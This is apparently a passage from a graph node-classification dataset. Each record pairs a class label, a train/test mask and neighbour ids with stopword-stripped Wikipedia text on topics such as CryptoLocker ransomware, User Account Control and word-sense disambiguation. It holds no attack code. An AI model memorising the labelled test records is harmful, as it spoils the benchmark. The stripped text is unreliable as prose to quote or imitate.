    "text": "CryptoLocker:cryptolocker cryptolocker ransomware attack cyberattack using cryptolocker ransomware occurred 5 september 2013 late may 2014 attack utilized trojan targeted computers running microsoft windows believed first posted internet 5 september 2013 propagated via infected email attachments via existing gameover zeus botnet activated malware encrypted certain types files stored local mounted network drives using rsa public-key cryptography private key stored malware control servers malware displayed message offered decrypt data payment either bitcoin pre-paid cash voucher made stated deadline threatened delete private key deadline passes deadline met malware offered decrypt data via online service provided malware operators significantly higher price bitcoin guarantee payment would release encrypted content although cryptolocker easily removed affected files remained encrypted way researchers considered unfeasible break many said ransom paid offer way recover files others said paying ransom way recover files backed victims claimed paying ransom always lead files decrypted cryptolocker isolated late may 2014 via operation tovar took gameover zeus botnet used distribute malware operation security firm involved process obtained database private keys used cryptolocker turn used build online tool recovering keys files without paying ransom believed operators cryptolocker successfully extorted total around 3 million victims trojan instances encryption-based ransomware followed used cryptolocker name variations otherwise unrelated cryptolocker typically propagated attachment seemingly innocuous e-mail message appears sent legitimate company zip file attached email message contains executable file filename icon disguised pdf file taking advantage windows default behaviour hiding extension file names disguise real .exe extension cryptolocker also propagated using gameover zeus trojan botnet first run payload installs user profile folder adds key registry causes run startup attempts contact one several designated command control servers connected server generates 2048-bit rsa key pair sends public key back infected computer server may local proxy go others frequently relocated different countries make tracing difficult payload encrypts files across local hard drives mapped network drives public key logs file encrypted registry key process encrypts data files certain extensions including microsoft office opendocument documents pictures autocad files payload displays message informing user files encrypted demands payment 400 usd euro anonymous pre-paid cash voucher i.e moneypak ukash equivalent amount bitcoin btc within 72 100 hours starting 2 btc ransom price adjusted 0.3 btc operators reflect fluctuating value bitcoin else private key server would destroyed nobody never able restore files payment ransom allows user download decryption program pre-loaded user private key infected victims claim paid attackers files decrypted november 2013 operators cryptolocker launched online service claimed allow users decrypt files without cryptolocker program purchase decryption key deadline expired process involved uploading encrypted file site sample waiting service find match site claimed match would found within 24 hours found user could pay key online 72-hour deadline passed cost increased 10 bitcoin 2 june 2014 united states department justice officially announced previous weekend operation tovar—a consortium constituting group law enforcement agencies including fbi interpol security software vendors several universities disrupted gameover zeus botnet used distribute cryptolocker malware department justice also publicly issued indictment russian hacker evgeniy bogachev alleged involvement botnet part operation dutch security firm fox-it able procure database private keys used cryptolocker august 2014 fox-it fellow firm fireeye introduced online service allows infected users retrieve private key uploading sample file receive decryption tool security software designed detect threats might detect cryptolocker encryption underway complete particularly new version unknown protective software distributed attack suspected detected early stages takes time encryption take place immediate removal malware relatively simple process completed would limit damage data experts suggested precautionary measures using software security policies block cryptolocker payload launching due nature cryptolocker operation experts reluctantly suggested paying ransom way recover files cryptolocker absence current backups offline backups made infection inaccessible infected computers attacked cryptolocker due length key employed cryptolocker experts considered practically impossible use brute-force attack obtain key needed decrypt files without paying ransom similar 2008 trojan gpcode.ak used 1024-bit key believed large enough computationally infeasible break without concerted distributed effort discovery flaw could used break encryption sophos security analyst paul ducklin speculated cryptolocker online decryption service involved dictionary attack encryption using database keys explaining requirement wait 24 hours receive result december 2013 zdnet traced four bitcoin addresses posted users infected cryptolocker attempt gauge operators takings four addresses showed movement 41,928 btc 15 october 18 december us 27 million time survey researchers university kent 41 claimed victims said decided pay ransom proportion much larger expected symantec estimated 3 victims paid dell secureworks estimated 0.4 victims paid following shutdown botnet used distribute cryptolocker calculated 1.3 infected paid ransom many able recover files backed others believed lost huge amounts data nonetheless operators believed extorted total around 3 million success cryptolocker spawned number unrelated similarly named ransomware trojans working essentially way including refer cryptolocker —but according security researchers unrelated original cryptolocker september 2014 clones cryptowall torrentlocker whose payload identifies cryptolocker named use registry key named bit torrent application began spreading australia ransomware uses infected e-mails purportedly sent government departments e.g australia post indicate failed parcel delivery payload evade detection automatic e-mail scanners follow links variant designed require users visit web page enter captcha code payload actually downloaded symantec determined new variants identified cryptolocker.f tied original",
    "neighbors": [
      1024,
      5636,
      10756,
      519,
      4117,
      8726,
      9761,
      4644,
      4133,
      3629,
      10297,
      1087,
      1608,
      3657,
      8779,
      4689,
      4703,
      8288,
      8292,
      4725,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      9375,
      7855,
      8368,
      9904,
      9395,
      8886,
      8387,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      4883,
      10003,
      3867,
      3366,
      297,
      2857,
      8489,
      11052,
      9518,
      7983,
      1337,
      6484,
      857,
      1882,
      7515,
      9055,
      9569,
      3428,
      3956,
      9082,
      7556,
      1925,
      7557,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      7633,
      4054,
      7639,
      8664,
      1504,
      8674,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 536,
    "label": 1,
    "text": "AustLit:_The_Australian_Literature_Resource:austlit australian literature resource austlit australian literature resource internet-based collaboration researchers librarians australian universities designed comprehensively record history australian literary story making cultures austlit encyclopaedia australian writers writing austlit founded 2000 resource research infrastructure literary studies funded participating universities australian research council university queensland leads consortium partner universities include university new south wales university sydney flinders university university wollongong james cook university university western australia significant levels research teaching field undertaken partner universities austlit publishes biographical entries brief essays australian writers critics storytellers organisational histories relating publishers theatre companies arts organisations complete bibliographical histories works fiction criticism also active digitisation program generate full text versions out-of-print literary works critical articles australian literature austlit research communities support detailed explorations particular aspects australia literary culture researchers work within austlit create datasets around specific field projects range across book magazine publishing histories subject specific surveys regionally based publishing thematically based subsets research history australian popular pulp fiction supported alongside research theatre history drama multicultural writers blackwords landmark austlit research project details lives work indigenous australian authors includes australian aboriginal torres strait islander writers storytellers austlit become key information resource study australian literature related fields status comprehensive record nation publishing history austlit become important source data analysing australian literary history",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 537,
    "label": 2,
    "text": "User_Account_Control:user account control user account control uac mandatory access control enforcement facility introduced microsoft windows vista windows server 2008 operating systems relaxed version also present windows 7 windows server 2008 r2 windows 8 windows server 2012 windows 10 aims improve security microsoft windows limiting application software standard user privileges administrator authorizes increase elevation way applications trusted user may receive administrative privileges malware kept compromising operating system words user account may administrator privileges assigned applications user runs inherit privileges unless approved beforehand user explicitly authorizes uac uses mandatory integrity control isolate running processes different privileges reduce possibility lower-privilege applications communicating higher-privilege ones another new technology user interface privilege isolation used conjunction user account control isolate processes one prominent use internet explorer 7 protected mode operating systems mainframes servers differentiated superusers userland decades obvious security component also administrative component prevented users accidentally changing system settings early microsoft home operating-systems ms-dos windows 95 windows 98 windows concept different user-accounts machine subsequent versions windows microsoft applications encouraged use non-administrator user-logons yet applications continued require administrator rights microsoft certify applications windows-compliant require administrator privileges applications may use windows-compliant logo packaging tasks require administrator privileges trigger uac prompt uac enabled typically marked security shield icon 4 colors windows logo vista windows server 2008 two panels yellow two blue windows 7 windows server 2008 r2 later case executable files icon security shield overlay following tasks require administrator privileges common tasks changing time zone require administrator privileges although changing system time since system time commonly used security protocols kerberos number tasks required administrator privileges earlier versions windows installing critical windows updates longer require administrator privileges vista program run administrator right-clicking icon clicking run administrator except msi msu packages due nature administrator rights required prompt usually shown fail workaround run command prompt administrator launch msi msp package user account control asks credentials secure desktop mode entire screen temporarily dimmed windows aero disabled authorization window full brightness present elevation user interface ui normal applications interact secure desktop helps prevent spoofing overlaying different text graphics top elevation request tweaking mouse pointer click confirmation button user intended administrative activity comes minimized application secure desktop request also minimized prevent focus lost possible disable secure desktop though inadvisable security perspective earlier versions windows applications written assumption user running administrator privileges experienced problems run limited user accounts often attempted write machine-wide system directories program files registry keys notably hklm uac attempts alleviate using file registry virtualization redirects writes subsequent reads per-user location within user profile example application attempts write directory c \\program files\\appname\\settings.ini user write permission write redirected c \\users\\username\\appdata\\local\\virtualstore\\program files\\appname\\settings.ini redirection feature provided non-elevated 32-bit applications include manifest requests specific privileges number configurable uac settings possible command prompt windows running elevated prefix title window word administrator user discern instances running elevated privileges distinction made elevation requests signed executable unsigned executable former whether publisher 'windows vista color icon wording prompts different case example attempting convey greater sense warning executable unsigned internet explorer 7 protected mode feature uses uac run 'low integrity level standard user token integrity level 'medium elevated administrator token integrity level 'high effectively runs sandbox unable write system apart temporary internet files folder without elevating via uac since toolbars activex controls run within internet explorer process run low privileges well severely limited damage system program request elevation number different ways one way program developers add requestedprivileges section xml document known manifest embedded application manifest specify dependencies visual styles appropriate security context setting level attribute requestedexecutionlevel asinvoker make application run token started highestavailable present uac prompt administrators run usual reduced privileges standard users requireadministrator require elevation highestavailable requireadministrator modes failure provide confirmation results program launched executable marked codice_1 manifest started non-elevated process using codice_2 instead codice_3 returned codice_4 codice_5 must used instead codice_6 supplied dialog show blinking item taskbar inspecting executable manifest determine requires elevation recommended elevation may required reasons setup executables application compatibility however possible programmatically detect executable require elevation using codice_2 setting codice_8 parameter codice_9 elevation required codice_3 returned elevation required success return code returned point one use codice_11 newly created suspended process allow one detect executable requires elevation one already executing elevated process however new process elevated privileges spawned within .net application using codice_12 verb example using c native win32 application codice_12 verb added codice_4 codice_5 call absence specific directive stating privileges application requests uac apply heuristics determine whether application needs administrator privileges example uac detects application setup program clues filename versioning fields presence certain sequences bytes within executable absence manifest assume application needs administrator privileges uac convenience feature neither introduces security boundary prevents execution malware leo davidson discovered microsoft weakened uac windows 7 exemption 70 windows programs displaying uac prompt presented proof concept privilege escalation stefan kanthak presented proof concept privilege escalation via uac installer detection iexpress installers stefan kanthak presented another proof concept arbitrary code execution well privilege escalation via uac auto-elevation binary planting complaints uac notifications slow various tasks computer initial installation software onto windows vista possible turn uac installing software re-enable later time however recommended since file registry virtualization active uac turned user settings configuration files may installed different place system directory rather user-specific directory uac switched would otherwise also internet explorer 7 protected mode whereby browser runs sandbox lower privileges standard user relies uac function uac disabled yankee group analyst andrew jaquith said six months vista released new security system shows promise far chatty annoying time windows vista released november 2006 microsoft drastically reduced number operating system tasks triggered uac prompts added file registry virtualization reduce number legacy applications triggered uac prompts however david cross product unit manager microsoft stated rsa conference 2008 uac fact designed annoy users force independent software vendors make programs secure uac prompts would triggered software written windows xp many peripherals would longer work windows vista 7 due extensive changes made introduction uac compatibility options also insufficient response criticisms microsoft altered uac activity windows 7 example default users prompted confirm many actions initiated mouse keyboard alone operating control panel applets controversial article new york times gadgetwise writer paul boutin said turn vista overly protective user account control pop-ups like mother hover shoulder work computerworld journalist preston gralla described nyt article ... one worst pieces technical advice ever issued",
    "neighbors": [
      11270,
      5643,
      13,
      4624,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      5673,
      10281,
      5682,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10835,
      10839,
      603,
      9819,
      8798,
      3170,
      5221,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      7804,
      10879,
      8841,
      651,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      10392,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      5799,
      7847,
      2221,
      7343,
      5300,
      7351,
      700,
      2749,
      10428,
      2244,
      8391,
      200,
      6345,
      9420,
      3283,
      7899,
      2782,
      8418,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      8954,
      1791,
      8959,
      11519,
      3330,
      2309,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      7473,
      1844,
      9525,
      10036,
      10039,
      11572,
      6972,
      3394,
      6476,
      8526,
      3922,
      4439,
      5465,
      7515,
      3935,
      2402,
      2919,
      4458,
      6506,
      4972,
      9066,
      9593,
      2943,
      1417,
      1418,
      2443,
      5003,
      5004,
      6028,
      2447,
      8080,
      3482,
      11677,
      929,
      11683,
      3496,
      4010,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      5057,
      7106,
      8132,
      6088,
      969,
      9166,
      3535,
      6098,
      8659,
      1498,
      5082,
      5594,
      478,
      9695,
      6114,
      6115,
      2027,
      6637,
      9709,
      11248,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 538,
    "label": 0,
    "text": "Word-sense_disambiguation:word-sense disambiguation computational linguistics word-sense disambiguation wsd open problem concerned identifying sense word used sentence solution problem impacts computer-related writing discourse improving relevance search engines anaphora resolution coherence inference human brain quite proficient word-sense disambiguation natural language formed way requires much reflection neurologic reality words human language developed way reflects also helped shape innate ability provided brain neural networks computer science information technology enables long-term challenge develop ability computers natural language processing machine learning rich variety techniques researched dictionary-based methods use knowledge encoded lexical resources supervised machine learning methods classifier trained distinct word corpus manually sense-annotated examples completely unsupervised methods cluster occurrences words thereby inducing word senses among supervised learning approaches successful algorithms date accuracy current algorithms difficult state without host caveats english accuracy coarse-grained homograph level routinely 90 methods particular homographs achieving 96 finer-grained sense distinctions top accuracies 59.1 69.0 reported evaluation exercises semeval-2007 senseval-2 baseline accuracy simplest possible algorithm always choosing frequent sense 51.4 57 respectively disambiguation requires two strict inputs dictionary specify senses disambiguated corpus language data disambiguated methods training corpus language examples also required wsd task two variants lexical sample words task former comprises disambiguating occurrences small sample target words previously selected latter words piece running text need disambiguated latter deemed realistic form evaluation corpus expensive produce human annotators read definitions word sequence every time need make tagging judgement rather block instances target word give hint works consider three examples distinct senses exist written word bass sentences people understand english first sentence using word bass fish former sense second sentence word bass instrument used latter sense developing algorithms replicate human ability often difficult task exemplified implicit equivocation bass sound bass instrument wsd first formulated distinct computational task early days machine translation 1940s making one oldest problems computational linguistics warren weaver famous 1949 memorandum translation first introduced problem computational context early researchers understood significance difficulty wsd well fact bar-hillel 1960 used example argue wsd could solved electronic computer need general model world knowledge 1970s wsd subtask semantic interpretation systems developed within field artificial intelligence starting wilks preference semantics however since wsd systems time largely rule-based hand-coded prone knowledge acquisition bottleneck 1980s large-scale lexical resources oxford advanced learner dictionary current english oald became available hand-coding replaced knowledge automatically extracted resources disambiguation still knowledge-based dictionary-based 1990s statistical revolution swept computational linguistics wsd became paradigm problem apply supervised machine learning techniques 2000s saw supervised techniques reach plateau accuracy attention shifted coarser-grained senses domain adaptation semi-supervised unsupervised corpus-based systems combinations different methods return knowledge-based systems via graph-based methods still supervised systems continue perform best one problem word sense disambiguation deciding senses cases like word bass least senses obviously different cases however different senses closely related one meaning metaphorical metonymic extension another cases division words senses becomes much difficult different dictionaries thesauruses provide different divisions words senses one solution researchers used choose particular dictionary use set senses generally however research results using broad distinctions senses much better using narrow ones however given lack full-fledged coarse-grained sense inventory researchers continue work fine-grained wsd research field wsd performed using wordnet reference sense inventory english wordnet computational lexicon encodes concepts synonym sets e.g concept car encoded car auto automobile machine motorcar resources used disambiguation purposes include roget thesaurus wikipedia recently babelnet multilingual encyclopedic dictionary used multilingual wsd real test part-of-speech tagging sense tagging closely related potentially making constraints question whether tasks kept together decoupled still unanimously resolved recently scientists incline test things separately e.g senseval/semeval competitions parts speech provided input text disambiguate instructive compare word sense disambiguation problem problem part-of-speech tagging involve disambiguating tagging words senses parts speech however algorithms used one tend work well mainly part speech word primarily determined immediately adjacent one three words whereas sense word may determined words away success rate part-of-speech tagging algorithms present much higher wsd state-of-the art around 95 accuracy better compared less 75 accuracy word sense disambiguation supervised learning figures typical english may different languages another problem inter-judge variance wsd systems normally tested results task compared human however relatively easy assign parts speech text training people tag senses far difficult users memorize possible parts speech word take often impossible individuals memorize senses word take moreover humans agree task hand – give list senses sentences humans always agree word belongs sense human performance serves standard upper bound computer performance human performance however much better coarse-grained fine-grained distinctions research coarse-grained distinctions put test recent wsd evaluation exercises ai researchers like douglas lenat argue one parse meanings words without form common sense ontology linguistic issue called pragmatics example comparing two sentences properly identify senses words one must know common sense facts moreover sometimes common sense needed disambiguate words like pronouns case anaphoras cataphoras text task-independent sense inventory coherent concept task requires division word meaning senses relevant task example ambiguity 'mouse animal device relevant english-french machine translation relevant information retrieval opposite true 'river requires choice french fleuve 'flows sea rivière 'flows river also completely different algorithms might required different applications machine translation problem takes form target word selection senses words target language often correspond significant meaning distinctions source language bank could translate french banque —that 'financial bank rive —that 'edge river information retrieval sense inventory necessarily required enough know word used sense query retrieved document sense unimportant finally notion word sense slippery controversial people agree distinctions coarse-grained homograph level e.g. pen writing instrument enclosure go one level fine-grained polysemy disagreements arise example senseval-2 used fine-grained sense distinctions human annotators agreed 85 word occurrences word meaning principle infinitely variable context sensitive divide easily distinct discrete sub-meanings lexicographers frequently discover corpora loose overlapping word meanings standard conventional meanings extended modulated exploited bewildering variety ways art lexicography generalize corpus definitions evoke explain full range meaning word making seem like words well-behaved semantically however clear meaning distinctions applicable computational applications decisions lexicographers usually driven considerations 2009 task – named lexical substitution – proposed possible solution sense discreteness problem task consists providing substitute word context preserves meaning original word potentially substitutes chosen full lexicon target language thus overcoming discreteness natural language processing two main approaches wsd – deep approaches shallow approaches deep approaches presume access comprehensive body world knowledge knowledge go fishing type fish low frequency sounds songs low frequency sounds parts types fish used determine sense word bass used approaches successful practice mainly body knowledge exist computer-readable format outside limited domains however knowledge exist deep approaches would much accurate shallow approaches also long tradition computational linguistics trying approaches terms coded knowledge cases hard say clearly whether knowledge involved linguistic world knowledge first attempt margaret masterman colleagues cambridge language research unit england 1950s attempt used data punched-card version roget thesaurus numbered heads indicator topics looked repetitions text using set intersection algorithm successful strong relationships later work especially yarowsky machine learning optimisation thesaurus method 1990s shallow approaches n't try understand text consider surrounding words using information bass words sea fishing nearby probably fish sense bass words music song nearby probably music sense rules automatically derived computer using training corpus words tagged word senses approach theoretically powerful deep approaches gives superior results practice due computer limited world knowledge however confused sentences like dogs bark tree contains word bark near tree dogs four conventional approaches wsd almost approaches normally work defining window n content words around word disambiguated corpus statistically analyzing n surrounding words two shallow approaches used train disambiguate naïve bayes classifiers decision trees recent research kernel-based methods support vector machines shown superior performance supervised learning graph-based approaches also gained much attention research community currently achieve performance close state art lesk algorithm seminal dictionary-based method based hypothesis words used together text related relation observed definitions words senses two words disambiguated finding pair dictionary senses greatest word overlap dictionary definitions example disambiguating words pine cone definitions appropriate senses include words evergreen tree least one dictionary similar approach searches shortest path two words second word iteratively searched among definitions every semantic variant first word among definitions every semantic variant word previous definitions finally first word disambiguated selecting semantic variant minimizes distance first second word alternative use definitions consider general word-sense relatedness compute semantic similarity pair word senses based given lexical knowledge base wordnet graph-based methods reminiscent spreading activation research early days ai research applied success complex graph-based approaches shown perform almost well supervised methods even outperforming specific domains recently reported simple graph connectivity measures degree perform state-of-the-art wsd presence sufficiently rich lexical knowledge base also automatically transferring knowledge form semantic relations wikipedia wordnet shown boost simple knowledge-based methods enabling rival best supervised systems even outperform domain-specific setting use selectional preferences selectional restrictions also useful example knowing one typically cooks food one disambiguate word bass cooking basses i.e. musical instrument supervised methods based assumption context provide enough evidence disambiguate words hence common sense reasoning deemed unnecessary probably every machine learning algorithm going applied wsd including associated techniques feature selection parameter optimization ensemble learning support vector machines memory-based learning shown successful approaches date probably cope high-dimensionality feature space however supervised methods subject new knowledge acquisition bottleneck since rely substantial amounts manually sense-tagged corpora training laborious expensive create lack training data many word sense disambiguation algorithms use semi-supervised learning allows labeled unlabeled data yarowsky algorithm early example algorithm uses ‘ one sense per collocation ’ ‘ one sense per discourse ’ properties human languages word sense disambiguation observation words tend exhibit one sense given discourse given collocation bootstrapping approach starts small amount seed data word either manually tagged training examples small number surefire decision rules e.g. 'play context 'bass almost always indicates musical instrument seeds used train initial classifier using supervised method classifier used untagged portion corpus extract larger training set confident classifications included process repeats new classifier trained successively larger training corpus whole corpus consumed given maximum number iterations reached semi-supervised techniques use large quantities untagged corpora provide co-occurrence information supplements tagged corpora techniques potential help adaptation supervised models different domains also ambiguous word one language often translated different words second language depending sense word word-aligned bilingual corpora used infer cross-lingual sense distinctions kind semi-supervised system unsupervised learning greatest challenge wsd researchers underlying assumption similar senses occur similar contexts thus senses induced text clustering word occurrences using measure similarity context task referred word sense induction discrimination new occurrences word classified closest induced clusters/senses performance lower methods described comparisons difficult since senses induced must mapped known dictionary word senses mapping set dictionary senses desired cluster-based evaluations including measures entropy purity performed alternatively word sense induction methods tested compared within application instance shown word sense induction improves web search result clustering increasing quality result clusters degree diversification result lists hoped unsupervised learning overcome knowledge acquisition bottleneck dependent manual effort approaches may vary differently methods knowledge acquisition bottleneck perhaps major impediment solving wsd problem unsupervised methods rely knowledge word senses sparsely formulated dictionaries lexical databases supervised methods depend crucially existence manually annotated examples every word sense requisite far met handful words testing purposes done senseval exercises one promising trends wsd research using largest corpus ever accessible world wide web acquire lexical information automatically wsd traditionally understood intermediate language engineering technology could improve applications information retrieval ir case however reverse also true web search engines implement simple robust ir techniques successfully mine web information use wsd historic lack training data provoked appearance new algorithms techniques described automatic acquisition sense-tagged corpora knowledge fundamental component wsd knowledge sources provide data essential associate senses words vary corpora texts either unlabeled annotated word senses machine-readable dictionaries thesauri glossaries ontologies etc classified follows structured unstructured comparing evaluating different wsd systems extremely difficult different test sets sense inventories knowledge resources adopted organization specific evaluation campaigns systems assessed in-house often small-scale data sets order test one algorithm developers spend time annotate word occurrences comparing methods even corpus eligible different sense inventories order define common evaluation datasets procedures public evaluation campaigns organized senseval renamed semeval international word sense disambiguation competition held every three years since 1998 senseval-1 1998 senseval-2 2001 senseval-3 2004 successor semeval 2007 objective competition organize different lectures preparing hand-annotating corpus testing systems perform comparative evaluation wsd systems several kinds tasks including all-words lexical sample wsd different languages recently new tasks semantic role labeling gloss wsd lexical substitution etc systems submitted evaluation competitions usually integrate different techniques often combine supervised knowledge-based methods especially avoiding bad performance lack training examples recent years wsd evaluation task choices grown criterion evaluating wsd changed drastically depending variant wsd evaluation task enumerates variety wsd tasks technology evolves word sense disambiguation wsd tasks grows different flavors towards various research directions languages",
    "neighbors": [
      5122,
      1027,
      133,
      2440,
      2059,
      396,
      8843,
      6798,
      11538,
      10231,
      1044,
      5781,
      5399,
      7839,
      416,
      3617,
      11043,
      7599,
      3504,
      10160,
      4531,
      4662,
      3127,
      2488,
      3385,
      3389,
      10557,
      6208,
      4676,
      11206,
      588,
      3533,
      5197,
      6223,
      9552,
      119,
      10456,
      8538,
      5857,
      1890,
      3811,
      7780,
      9702,
      7918,
      8046,
      8688,
      887,
      8440,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 539,
    "label": 7,
    "text": "Outsourcery:outsourcery outsourcery plc uk-based cloud services provider founded 2007 co-ceos piers linney simon newton company went administration june 2016 business assets acquired gci network solutions ltd. outsourcery employed approximately 110 people across three offices leicester london manchester company provided solutions cloud-based services offered directly via network partners deployed proprietary o-cloud platform housed ofcom regulated enterprise grade datacenters outsourcery member microsoft cloud os network also founder member cloud industry forum cif outsourcery o-cloud platform certified run government classified information official official sensitive internet gave outsourcery cesg pan government accreditation pga formerly il2 public services network psn protect formerly il3 connectivity meet data sovereignty security specifications public sector uk government outsourcery former co-ceo piers linney became better known 'dragon series 11 12 bbc two television programme dragons den outsourcery origins date 1997 business initially provided mobile solutions uk organisations piers linney simon newton acquired business assets genesis communications – established business-to-business mobile voice data reseller year genesis acquired early stage microsoft application hosting company servelogic limited enabling enter hosted services market 2007 2010 company saw revenue cloud-based services grow zero £4 million legacy business subsequently sold two transactions 2011 total £15 million outsourcery board led ken olisa obe non-executive chairman along piers linney co-founder co-ceo simon newton co-founder co-ceo andrew burton non-executive director jane hall non-executive director 24 may 2013 outsourcery admitted london alternative investment market aim sale legacy mobile distribution business completed 3 september 2013 6 november 2013 outsourcery announced partnered dell design deploy secure cloud-based system announcement followed outsourcery agreement microsoft lead uk initiative accelerate offering cloud services uk public sector particular central government outsourcery suspended trading stock aim 3 june 2016 due inability present audited financial results year ended 31 december 2015 stated potential proceeds current proposals would potentially leave limited value equity shareholders later month ernst young appointed administrators business assets sold gci network solutions ltd",
    "neighbors": [
      1400,
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 540,
    "label": 2,
    "text": "Windows_SideShow:windows sideshow windows sideshow technology developed microsoft introduced windows vista operating system designed provide information number unread e-mail messages rss feeds secondary display windows-based device displays may integrated part device included part separate component connected personal computer sideshow integrates windows gadgets feature windows vista windows 7 also integrate applications windows media center sideshow discontinued windows 8.1 auxiliary displays listed microsoft among forms information indicators personal computers windows hardware engineering conference 2003 auxiliary display feature later presented microsoft winhec 2004 scheduled included windows vista known codename longhorn intended tablet pcs mobile devices provide users up-to-date information glance increase value windows operating system new mobile scenarios auxiliary display support included among mobile features scheduled operating system including windows mobility center speech recognition windows hotstart listed part microsoft mobile pc strategy prototype auxiliary display device demonstrated intel intel developer forum conference fall 2004 february 2005 microsoft announced first beta version windows vista codenamed longhorn would include support feature preliminary software development kit would also released concurrently operating system winhec 2005 microsoft released details sideshow development platform discussed new scenarios enabled technology prototypes also produced several original equipment manufacturers oems displayed conference microsoft would release details year later winhec 2006 additional hardware also displayed windows vista released manufacturing november 8 2006 includes two sideshow gadgets one windows mail one windows media player microsoft office 2007 released manufacturing day windows vista included outlook 2007 calendar gadget sideshow windows 7 microsoft introduced multiple user support gadgets improved reliability resiliency sideshow apis gadgets multiple devices improved asynchronous processing throughput updated sideshow control panel experience changes prominent link settings introduction tooltip descriptions gadgets windows sideshow displays embedded part device separate component examples include electronic visual display integrated part keyboard digital photo frames receive information wirelessly wireless devices connected personal computer wireless network technologies including bluetooth wi-fi manufacturers may also produce detachable displays sideshow devices display various types information contacts calendar appointments e-mail maps rss feeds serve indicators system information battery life wireless network strength microsoft published documentation suggests additional uses sideshow devices ability transmit information notifications received computer across televisions set-top boxes ability serve second screen pc games content e.g. character statistics maps enable new multitasking scenarios gameplay sideshow features integration windows desktop gadget feature windows vista windows 7 enables single gadget operate simultaneously user desktop supplying data across devices sideshow uses windows portable devices infrastructure communicate devices viewed portable device file explorer users also adjust interact files included part auxiliary displays auxiliary displays appear device manager integrate windows vista function discovery technology gadget developed sideshow written programming windows sideshow platform application programming interface—a native code com-based api introduced windows vista managed api .net framework developers also released microsoft includes development templates visual studio 2005 visual studio 2008 aid development gadgets microsoft released sideshow simulator emulates functionality sideshow-compatible device thereby allowing developers test appearance functionality gadgets without requiring physical hardware devices windows sideshow different hardware traits devices mobile phones pdas former processor need rely solely connection computer processing tasks online offline abilities allow device run larger components connected computer following list contains typical device display types technologies hardware-specific native applications provide rich-media experiences like audio video playback accessed sideshow user interface require sdk specific platform vendor example nvidia provides preface platform includes abilities like mp3 aac mpeg-4 encode-decode digital media formats oems accepted sideshow 2007 asus announced w5fe laptop full-color 2.8-inch sideshow display front cover 2006 featured winhec 7-inch 10-inch momento digital photo frames released developer living picture provided sideshow functionality wifi subsequently marketed i-mate along momento live picture service shut 2009 october 2007 dell released xps 420 included sideshow device top front machine widely promoted found little use quietly dropped xps 430 came year later february 1 2010 ikanos consulting announced threemote suite windows sideshow-compatible products embedded platforms including windows mobile google android kopin golden-i threemote appears unsupported unavailable android market time available windows mobile blog posting april 2010 technical director ikanos consulting said sideshow dead threemote bubbling along february 7 2012 chris james released ms sideshow device implementation windows sideshow device google android microsoft discontinued sideshow gallery duplication sideshow gallery content available windows sidebar gadget gallery introduction windows 8.1 microsoft discontinued technology removed support sideshow devices operating system",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      1077,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      4704,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      488,
      6637,
      9709,
      6641,
      3573,
      10229
    ],
    "mask": "Test"
  },
  {
    "node_id": 541,
    "label": 2,
    "text": "Weak_reference:weak reference computer programming weak reference reference protect referenced object collection garbage collector unlike strong reference object referenced weak references – meaning every chain references reaches object includes least one weak reference link – considered weakly reachable treated unreachable may collected time garbage-collected languages feature support various levels weak references c java lisp ocaml perl python weak references number common use cases using reference counting garbage collection weak references break reference cycles using weak reference link cycle one associative array mapping hash map whose keys references objects example hold auxiliary data objects using weak references keys avoids keeping objects alive use key one object objects registered observer pattern particularly event handling strong reference kept objects must explicitly unregistered otherwise memory leak occurs lapsed listener problem weak reference removes need unregister holding cached data recreated necessary weak references allow cache reclaimed effectively producing discardable memory last case cache distinct others preferable objects garbage collected necessary thus need finer distinctions within weak references stronger form weak reference many cases weak references need directly used instead simply using weak array container whose keys values weak references garbage collection used clean unused objects reduce potential memory leaks data corruption two main types garbage collection tracing reference counting reference counting schemes record number references given object collect object reference count becomes zero reference-counting collect cyclic circular references one object may collected time groups mutually referencing objects directly referenced objects unreachable thus become permanently resident application continually generates unreachable groups unreachable objects effect memory leak weak references references counted reference counting may used solve problem circular references reference cycles avoided using weak references references within group common case strong vs. weak reference distinctions tree structures document object model dom parent-to-child references strong child-to-parent references weak example apple cocoa framework recommends approach indeed even object graph 